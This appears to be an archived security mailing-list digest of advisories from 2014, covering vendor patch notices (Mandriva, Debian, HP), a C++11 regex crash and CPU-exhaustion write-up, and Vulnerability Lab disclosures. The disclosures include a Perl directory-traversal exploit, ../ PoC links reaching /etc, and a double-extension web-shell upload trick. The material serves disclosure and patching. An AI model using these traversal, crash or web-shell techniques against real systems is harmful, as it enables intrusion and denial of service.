[ MDVSA-2014:145 ] php-ZendFramework

2014-08-01 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:145
 http://www.mandriva.com/en/support/security/
 ___

 Package : php-ZendFramework
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in php-ZendFramework:
 
 The implementation of the ORDER BY SQL statement in Zend_Db_Select
 of Zend Framework 1 contains a potential SQL injection when the query
 string passed contains parentheses (CVE-2014-4914).
 
 The updated packages have been upgraded to the latest ZendFramework
 (1.12.7) version which is not vulnerable to this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4914
 http://framework.zend.com/security/advisory/ZF2014-04
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 f9e5804a58b8af73a972bfa0a2da6284  
mbs1/x86_64/php-ZendFramework-1.12.7-1.mbs1.noarch.rpm
 1a5d10af134d2b517d3752a8119b2339  
mbs1/x86_64/php-ZendFramework-Cache-Backend-Apc-1.12.7-1.mbs1.noarch.rpm
 1d37c1497156c59d7539333b2b413e8b  
mbs1/x86_64/php-ZendFramework-Cache-Backend-Memcached-1.12.7-1.mbs1.noarch.rpm
 99414b75a630264f9dcfe4c8dfa53e6e  
mbs1/x86_64/php-ZendFramework-Captcha-1.12.7-1.mbs1.noarch.rpm
 9ac1fb5c76b9f0b71abf1bf90a273ebd  
mbs1/x86_64/php-ZendFramework-demos-1.12.7-1.mbs1.noarch.rpm
 d25f8e0658bbe3ce7f026d20baeebadf  
mbs1/x86_64/php-ZendFramework-Dojo-1.12.7-1.mbs1.noarch.rpm
 75218f17b04edc9c422aa8117239411d  
mbs1/x86_64/php-ZendFramework-extras-1.12.7-1.mbs1.noarch.rpm
 9ca8a5d6aa73e77f2e679e5020be0d41  
mbs1/x86_64/php-ZendFramework-Feed-1.12.7-1.mbs1.noarch.rpm
 46c3592a516b33b3f30fa6603d9085b7  
mbs1/x86_64/php-ZendFramework-Gdata-1.12.7-1.mbs1.noarch.rpm
 aecf3e6879dca04b9084660c5f490626  
mbs1/x86_64/php-ZendFramework-Pdf-1.12.7-1.mbs1.noarch.rpm
 44829853ef1ac199da93b5affaec8070  
mbs1/x86_64/php-ZendFramework-Search-Lucene-1.12.7-1.mbs1.noarch.rpm
 2338a7798d2ce6f72666a1fcedfe9b72  
mbs1/x86_64/php-ZendFramework-Services-1.12.7-1.mbs1.noarch.rpm
 914762e556834e2ce9e17d6d10ad81a0  
mbs1/x86_64/php-ZendFramework-tests-1.12.7-1.mbs1.noarch.rpm 
 a8bd5d5bc7c4c8579278e22650a4d3be  
mbs1/SRPMS/php-ZendFramework-1.12.7-1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFT2esDmqjQ0CJFipgRAuIqAKDiZkSxIOcYE5rqlzO9pcoZdzQe5QCdF8EM
FqiUcm9b3m34mIxKJh1+ePU=
=aLqo
-END PGP SIGNATURE-



[ MDVSA-2014:146 ] file

2014-08-01 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:146
 http://www.mandriva.com/en/support/security/
 ___

 Package : file
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in file:
 
 file before 5.19 does not properly restrict the amount of data read
 during a regex search, which allows remote attackers to cause a
 denial of service (CPU consumption) via a crafted file that triggers
 backtracking during processing of an awk rule. NOTE: this vulnerability
 exists because of an incomplete fix for CVE-2013-7345 (CVE-2014-3538).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
 http://www.ubuntu.com/usn/usn-2278-1/
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 0636c4e876032a3ff1002c5d63de21d9  mbs1/x86_64/file-5.12-1.4.mbs1.x86_64.rpm
 ff23b901c9785895ba3f28fff7bf0de3  
mbs1/x86_64/lib64magic1-5.12-1.4.mbs1.x86_64.rpm
 42fd86544666d9dfaaacf024a10f7b8d  
mbs1/x86_64/lib64magic-devel-5.12-1.4.mbs1.x86_64.rpm
 49a659053ba64b6c876327ea4502fd48  
mbs1/x86_64/lib64magic-static-devel-5.12-1.4.mbs1.x86_64.rpm
 800f518cb307bc382b7ca75482e41371  
mbs1/x86_64/python-magic-5.12-1.4.mbs1.noarch.rpm 
 88247988206ea8316ff26621797b249f  mbs1/SRPMS/file-5.12-1.4.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFT2ex7mqjQ0CJFipgRAqh2AKDVuGs69Zc1uJwDrV8C58nJrAtMKwCg7pzM
ioZYyztBjD25vFlGNwpLAXo=
=5tOC
-END PGP SIGNATURE-



[SECURITY] [DSA 2993-1] tor security update

2014-08-01 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2993-1   secur...@debian.org
http://www.debian.org/security/   Peter Palfrader
July 31, 2014  http://www.debian.org/security/faq
- -

Package: tor
CVE ID : CVE-2014-5117

Several issues have been discovered in Tor, a connection-based
low-latency anonymous communication system, resulting in information
leaks.

o  Relay-early cells could be used by colluding relays on the network to
   tag user circuits and so deploy traffic confirmation attacks
   [CVE-2014-5117].  The updated version emits a warning and drops the
   circuit upon receiving inbound relay-early cells, preventing this
   specific kind of attack.  Please consult the following advisory for
   more details about this issue:

 
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack

o  A bug in the bounds-checking in the 32-bit curve25519-donna
   implementation could cause incorrect results on 32-bit
   implementations when certain malformed inputs were used along with a
   small class of private ntor keys.  This flaw does not currently
   appear to allow an attacker to learn private keys or impersonate a
   Tor server, but it could provide a means to distinguish 32-bit Tor
   implementations from 64-bit Tor implementations.

The following additional security-related improvements have been
implemented:

o  As a client, the new version will effectively stop using CREATE_FAST
   cells.  While this adds computational load on the network, this
   approach can improve security on connections where Tor's circuit
   handshake is stronger than the available TLS connection security
   levels.

o  Prepare clients to use fewer entry guards by honoring the consensus
   parameters.  The following article provides some background:

 
https://blog.torproject.org/blog/improving-tors-anonymity-changing-guard-parameters

For the stable distribution (wheezy), these problems have been fixed in
version 0.2.4.23-1~deb7u1.

For the testing distribution (jessie) and the unstable distribution
(sid), these problems have been fixed in version 0.2.4.23-1.

For the experimental distribution, these problems have been fixed in
version 0.2.5.6-alpha-1.

We recommend that you upgrade your tor packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJT2ht+AAoJEAVMuPMTQ89EtFgP/3AWMfTTOxdZn046F/QemXPl
zuDTBhfllKc2s0UXOV63/yjfqr0oa703a/EhWIwZttc9NTi03NY9iKEwNeB+HUCN
b3hENNISFdVp5i11pmbExSTGhfmgBLMPXXJAKbj5Zz1wsUr4SKJpsI0caaBXOOYp
mTOHy0iKvT8RnpBiR0v2pXcCAQEqPy/7j99npO8SDwlOIcG7bmePc+L6YsHT99gh
shNxnnjQIqO45rVHkqVCJc7uEx5k3i3rq0nDQnTrbiZI4G2zOJi7XfteJlCzl0vc
XUt/7cTQeKyIRnNhRE09BctSs+bygCOJXY94iBoOc3eTxGeMoLcORRGZ8R1Jae99
cj8cfT3rH/SP1uWON071I9awwhXaC0nwHtkejAiA6S51rZBaUnQqCFEHp/D3ku7V
NZ8Iux1JYkuXFYyU/FgFouRpbyt3ApITgKFjCySZmH0Kcm7C78gUuHyXhgvQfhdw
MG9DvNIMlRKNAOXlBA9ZUSNpz1YzHRrv0KpwPnlaKSMwvuuuzhfXqFUzbEFLjbkL
pPx0goe/BAmdRDKD0to4JhnpzRh71HtZwIOwJWQpqQ/p2IN0s7C5hrfk+g+Bh5kl
fQBUnE18ZJC9ytQlUkYUd0Isc6HfmSQn3C2KA8pDV5jXn4tCMe9u2kfsB10uAPiY
K/PnpW3fw41iiJPdYDZI
=+/Vb
-END PGP SIGNATURE-



TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities

2014-08-01 Thread Vulnerability Lab
Document Title:
===
TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1284


Release Date:
=
2014-07-30


Vulnerability Laboratory ID (VL-ID):

1284


Common Vulnerability Scoring System:

7.4


Product  Service Introduction:
===
iFolder+, Belong to yourself is a mobile application coded by TigerCom. The 
application allows to communicate 
and share information or files in the wifi network. The app is uncommercial and 
can be downloaded through the 
apple itunes shop or app-store. 

- Safty
- Intelligent encryption, protect the folder
- No Internet connection to prevent the documents stolen
- Password protected, locked the document
- Wireless transmission
- Using Wifi, you can share files between iphone, ipad and computer
- Current open folder sharing, better protect your privacy
- Private photos/videos/documents
- Import photos and videos from album
- Export photos and videos to your album
- Open camera, store photos and recording video
- Photos and videos preview
- Photos and video high fidelity storage
- Photo browsing, support for gestures to zoom
- video playing, perfect playback experience
- Support PDF, TXT documents directly browsing
- Photo folder, Video folder, Documents folder, easily classified
- Support Wifi Import and Export
- Private accounts/contacts
- Account protection, add a variety of accounts

( Copy of the Homepage: https://itunes.apple.com/de/app/ifolder+/id622423906 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the official TigerCom iFolder+ v1.2 iOS mobile application.


Vulnerability Disclosure Timeline:
==
2014-07-30: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

TigerCom
Product: iFolder+ - iOS Mobile Web Application 1.2


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details  Description:

1.1
A local file include web vulnerability has been discovered in the official 
TigerCom iFolder+ v1.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to 
unauthorized include local file/path requests or system specific 
path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `uploadfile` 
module. Remote attackers are able to inject own files 
with malicious `filename` values in the `uploadfile` POST method request to 
compromise the mobile web-application. The local file/path 
include execution occcurs in the index `folder list` context next to the 
vulnerable filename value. The attacker is able to inject the 
local file request by usage of the available `wifi interface` for file or 
folder exchange/share.

Remote attackers are also able to exploit the filename validation issue in 
combination with persistent injected script codes to execute 
different local malicious attacks requests. The attack vector is on the 
application-side of the wifi service and the request method to 
inject is POST. 

The security risk of the local file include web vulnerability is estimated as 
high with a cvss (common vulnerability scoring system) count 
of 7.3. Exploitation of the local file include web vulnerability requires no 
privileged web-application user account or user interaction. 
Successful exploitation of the local file include web vulnerability results in 
mobile application or connected device component compromise.


Request Method(s):
[+] [POST]

Vulnerable Service(s):
[+] iFolder+ v1.2

Vulnerable Module(s):
[+] uploadfile

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index Folder Dir Listing 
(http://localhost:8080/)


1.2
An arbitrary file upload web vulnerability has been discovered in the official 
TigerCom iFolder+ v1.2 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with 
multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the `uploadfile` module. Remote attackers are 
able to upload a php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker 
uploads for example a web-shell with the following name and extension 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the 
file in the web application. He deletes the .jpg  . gif file 
extension and can access the application file with elevated 

[SECURITY] [DSA 2994-1] nss security update

2014-08-01 Thread Raphael Geissert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2994-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
July 31, 2014  http://www.debian.org/security/faq
- -

Package: nss
CVE ID : CVE-2013-1741 CVE-2013-5606 CVE-2014-1491 CVE-2014-1492

Several vulnerabilities have been discovered in nss, the Mozilla Network
Security Service library:

CVE-2013-1741

Runaway memset in certificate parsing on 64-bit computers leading to
a crash by attempting to write 4Gb of nulls.

CVE-2013-5606

Certificate validation with the verifylog mode did not return
validation errors, but instead expected applications to determine
the status by looking at the log.

CVE-2014-1491

Ticket handling protection mechanisms bypass due to the lack of
restriction of public values in Diffie-Hellman key exchanges.

CVE-2014-1492

Incorrect IDNA domain name matching for wildcard certificates could
allow specially-crafted invalid certificates to be considered as
valid.

For the stable distribution (wheezy), these problems have been fixed in
version 2:3.14.5-1+deb7u1.

For the testing distribution (jessie), and the unstable distribution (sid),
these problems have been fixed in version 2:3.16-1.

We recommend that you upgrade your nss packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iEYEARECAAYFAlPaLcQACgkQYy49rUbZzlryAwCfcT/wdXfIg3Qan7v49hkErZtP
XU4AoIuaVrosMXowQjtqvD8LJqNZ9hd+
=rne3
-END PGP SIGNATURE-



[ MDVSA-2014:147 ] sendmail

2014-08-01 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:147
 http://www.mandriva.com/en/support/security/
 ___

 Package : sendmail
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated sendmail packages fix security vulnerability:
 
 Sendmail before 8.14.9 does not properly closing file descriptors
 before executing programs. This bug could enable local users to
 interfere with an open SMTP connection if they can execute their own
 program for mail delivery (e.g., via procmail or the prog mailer)
 (CVE-2014-3956).
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3956
 http://advisories.mageia.org/MGASA-2014-0270.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 9f87330fbfb62d7ae3b22b0cada29c52  
mbs1/x86_64/sendmail-8.14.6-2.1.mbs1.x86_64.rpm
 7c54405a5aad8b5d269f826dcedf3815  
mbs1/x86_64/sendmail-cf-8.14.6-2.1.mbs1.x86_64.rpm
 82b6adad99a9e24e8d1ce9be4169c02c  
mbs1/x86_64/sendmail-devel-8.14.6-2.1.mbs1.x86_64.rpm
 7351c18b5763064dd79d4e750e1b0a83  
mbs1/x86_64/sendmail-doc-8.14.6-2.1.mbs1.x86_64.rpm 
 ae7f0df3cc9fac2f0586184bf5eaf382  mbs1/SRPMS/sendmail-8.14.6-2.1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFT2gz3mqjQ0CJFipgRAuZDAJ9arMIYKjF9sD2MNz051quy/gx7YACgxVAt
BpmuxuyJoiM1vWndD1+k5zY=
=T6gv
-END PGP SIGNATURE-



[ MDVSA-2014:148 ] dbus

2014-08-01 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:148
 http://www.mandriva.com/en/support/security/
 ___

 Package : dbus
 Date: July 31, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated dbus packages fix security vulnerabilities:
 
 A flaw was reported in D-Bus#039;s file descriptor passing feature. A
 local attacker could use this flaw to cause a service or application
 to disconnect from the bus, typically resulting in that service or
 application exiting (CVE-2014-3532).
 
 A flaw was reported in D-Bus#039;s file descriptor passing feature. A local
 attacker could use this flaw to cause an invalid file descriptor to be
 forwarded to a service or application, causing it to disconnect from
 the bus, typically resulting in that service or application exiting
 (CVE-2014-3533).
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3532
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3533
 http://advisories.mageia.org/MGASA-2014-0294.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 3ec7d0230c9bba5579b6970e80e30b1d  mbs1/x86_64/dbus-1.4.16-6.4.mbs1.x86_64.rpm
 0086d90124d84e60a09c70fa8e70baf3  
mbs1/x86_64/dbus-doc-1.4.16-6.4.mbs1.x86_64.rpm
 d126249502ee1a3819af4e5ae9600115  
mbs1/x86_64/dbus-x11-1.4.16-6.4.mbs1.x86_64.rpm
 17d4362c3888962ac3e402eacc5aac15  
mbs1/x86_64/lib64dbus-1_3-1.4.16-6.4.mbs1.x86_64.rpm
 8e46f1e7c2c5d4fb2ffc4fda7bfba55b  
mbs1/x86_64/lib64dbus-1-devel-1.4.16-6.4.mbs1.x86_64.rpm 
 df3ab9438c830215ad2b3597921d0333  mbs1/SRPMS/dbus-1.4.16-6.4.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFT2g5hmqjQ0CJFipgRAqnvAJ9dYBe41rRJS6wgul/J+MM9FucTcQCgwqnZ
ZAJiQeK2X5Igq8mHwz7YuwQ=
=TEte
-END PGP SIGNATURE-



[security bulletin] HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure

2014-08-01 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c04390793

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04390793
Version: 1

HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-07-31
Last Updated: 2014-07-31

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Enterprise
Maps. The vulnerability could be exploited remotely to allow disclosure of
information.

References: CVE-2014-2628, SSRT101627

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Enterprise Maps v.1

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-2628(AV:N/AC:L/Au:S/C:C/I:C/A:C)9
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided a patch for HP Enterprise Maps v.1 to resolve the
vulnerability. Please contact HP support to request the patch.

HISTORY
Version:1 (rev.1) - 31 July 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlPasC0ACgkQ4B86/C0qfVmwUgCg2UrkZP26BEuU4SEd/Fo+qDPz
CuIAn3r8C4EOIpsIgJGsdb1H+wvd3lNp
=LNnF
-END PGP SIGNATURE-


C++11 regex insecure by default

2014-08-01 Thread submit
C++11 regex insecure by default
http://cxsecurity.com/issue/WLB-2014070187


--- 0 Description ---
In this article I will present a conclusion of testing the new 'objective 
regex' in several implementation of standard c++ library like libcxx (clang) 
and stdlibc++ (gcc). The results show the weakness in official supported 
implementations. Huge complexity and memory exhaustion were well known in most 
of libc libraries. Theoretical the new c++11 regex eliminate resource 
exhaustion by specifying special limits preventing for evil patterns. 
In glibc there was the conviction that for the safety of use regcomp() respond 
vendor using regex implementation. However, it is difficult to do the parser of 
regular expression in clients applications and others remote affected. The 
exceptions support for regex errors looks very promising. Let's see some part 
of documentation std::regex_error

-std::regex_constants::error_type---
error_space  
there was not enough memory to convert the expression into a finite state 
machine

error_complexity
the complexity of an attempted match exceeded a predefined level

error_stack
there was not enough memory to perform a match
-std::regex_constants::error_type---

error_complexity looks promising but which the value of level complexity is the 
best'? There is many interpretations between usability and security. In 
security aspect this level should be low for to keep real time execution. In 
contrast to the static code analysis where execution time is not so important. 
The other constants like error_space and error_stack are also interesting in 
security view. 
After official release for stdlibc++ regex in GCC 4.9.0 I have decided check 
this implementation. To prove that these limits do not fulfill their role, I 
reported below issues

GCC:
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582

CLANG:
libcxx C++11 regex cpu resource exhaustion 
http://llvm.org/bugs/show_bug.cgi?id=20291

In my observation libc++ wins in performance. Only problem with error 
complexity reported. In ticket #20291 we are searching answer for default 
pre-set level value. However for each use can be personal. GCC has fixed most 
dangerous issues before releasing official version 4.9.0 where regex is 
supported. Anyway stack overflow still occurs in last regex implementation.


--- 0.1 GCC before 4.9 Memory corruption ---
# ./c11RE '(|'
Segmentation fault (core dumped)


--- 0.2 GCC 4.9 Memory corruption ---
(gdb) r '((.*)()?*{100})'
Starting program: /home/cx/REstd11/kozak5/./c11re '((.*)()?*{100})'

Program received signal SIGSEGV, Segmentation fault.
0x00402f15 in std::_Bit_reference::operator bool() const


--- 0.3 GCC Trunk Stack Overflow ---
Starting program: /home/cx/REtrunk/kozak5/t3 '(.*{100}{300})'

Program received signal SIGSEGV, Segmentation fault.
0x0040c22a in std::__detail::_Executorchar const*, 
std::allocatorstd::sub_matchchar const* , std::regex_traitschar, 
true::_M_dfs(std::__detail::_Executorchar const*, 
std::allocatorstd::sub_matchchar const* , std::regex_traitschar, 
true::_Match_mode, long) ()


--- 0.4 CLANG CPU Exhaustion PoC ---
#include iostream
#include regex 
#include string

using namespace std;

int main() {
try {
regex r((.*(.*){9}), 
regex_constants::extended);
smatch results;
string test_str = 
|||;
if (regex_search(test_str, results, r))
cout  results.str()  endl;
else
cout  no match;
} catch (regex_error e) {
cout  extended: what:   e.what()  ; code:   e.code()  
endl;
}

return 0;
}
--- CLANG CPU Exhaustion ---


--- 1 Conclusion ---
I think It's dangerous situation what may have a bearing on the quality similar 
to the glibc regex.h.  Maybe only a new type of extended regular expressions 
provide safety? It's good moment to start discussion about of safety regex in 
new c++.


--- 2 References ---
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
libcxx C++11 regex cpu resource exhaustion 
http://llvm.org/bugs/show_bug.cgi?id=20291
GCC 4.9 Release Series New Features
https://gcc.gnu.org/gcc-4.9/changes.html


--- 3 Thanks ---
gcc and clang support and KacperR


--- 4 About ---
Author:
Maksymilian Arciemowicz

Contact:
http://cxsecurity.com/wlb/add/



Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability

2014-08-01 Thread Vulnerability Lab
Document Title:
===
Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1285


Release Date:
=
2014-07-31


Vulnerability Laboratory ID (VL-ID):

1286


Common Vulnerability Scoring System:

6.7


Product  Service Introduction:
===
Using this app, you can download photos to a PC or a smartphone from your 
iPhone through WiFi. The app provides the easiest and 
fastest way to do it. Just run the app on the iPhone and open the web browser 
on your PC or another smart phone. That is all 
that you are required to do. It is quite simple. In addition to the web 
browser, a ftp client application is also supported to 
access the photos. Do not pay money for these functions as the app provides all 
of them without charging. 

(Copy of the Homepage: 
https://itunes.apple.com/us/app/photo-wifi-transfer/id892772036 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a directory traversal 
vulnerability in the official BlueFinger Photo WiFi Transfer v1.01 iOS mobile 
application.


Vulnerability Disclosure Timeline:
==
2014-07-31: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

BlueFinger Apps
Product: Photo WiFi Transfer - iOS Mobile Web Application (FTP) 1.01


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details  Description:

A directory traversal web vulnerability has been discovered in the official 
BlueFinger Photo WiFi Transfer v1.01 iOS mobile application.
The vulnerability allows remote attackers to bypass the path restriction of a 
service to access sensitive app-, web-server or -device information.

The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the 
wifi `web-server` module. The issue allows an attacker to bypass 
the regular `folder/path` validation mechnism to access sensitive app 
web-server or iOS -device information. The attack vector of the issue is on 
the application-side of the service and to perform malicious request the `GET 
method` is required to use.

After the start of the web-server by usage of the ftp function, the attacker is 
able to include 5 more path values (../../../../../) to access 
unauthorized higher folders outside the mobile application service. In the 
analysis we saw that the path change of 5 directories is required 
to bypass. During the tests we accessed the full app service folder and through 
the directory traversal to web-server configuration files but 
also the parent device directory.

The security risk of the directory traversal web vulnerability is estimated as 
high with a cvss (common vulnerability scoring system) 
count of 6.7. Exploitation of the path traversal web vulnerability requires no 
privileged web-application user account or user interaction. 
Successful exploitation of the directory traversal vulnerability results in 
mobile application or connected device component compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Directory

Vulnerable Parameter(s):
[+] path

Affected Module(s):
[+] Parent Directory (ftp://localhost:8080/)


Proof of Concept (PoC):
===
The directory traversal web vulnerability can be exploited by attackers without 
privileged application user account and user interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.

Exception:
50 
/private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/photo/../../etc/passwd
 No such file or directory.

Standard Request:
ftp://localhost:8080/../../Documents/

PoC: Links
ftp://localhost:8080/../../../../../../../../../../../../../../../../etc
ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/
ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/
ftp://localhost:8080/../../../../../../../../../../../../../../../../System/


Exploit: PoC (PL)
#!/usr/bin/perl
use LWP::Simple;
print ---\n;
print -= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal=-\n;
print ---\n\n;

print Target(ftp://localhost:8080/)\ ;
chomp($targ = STDIN);

print Path: (/fn25/)\;
chomp($path=STDIN);

$url = ../../../../../../../../etc/;
$page = get(http://.$targ.$path.$url) || die [-] Unable to retrieve: $!;
print [+] Connected to: $page\n;


Exploit: PoC (HTML)
html
headbodytitle/title
iframe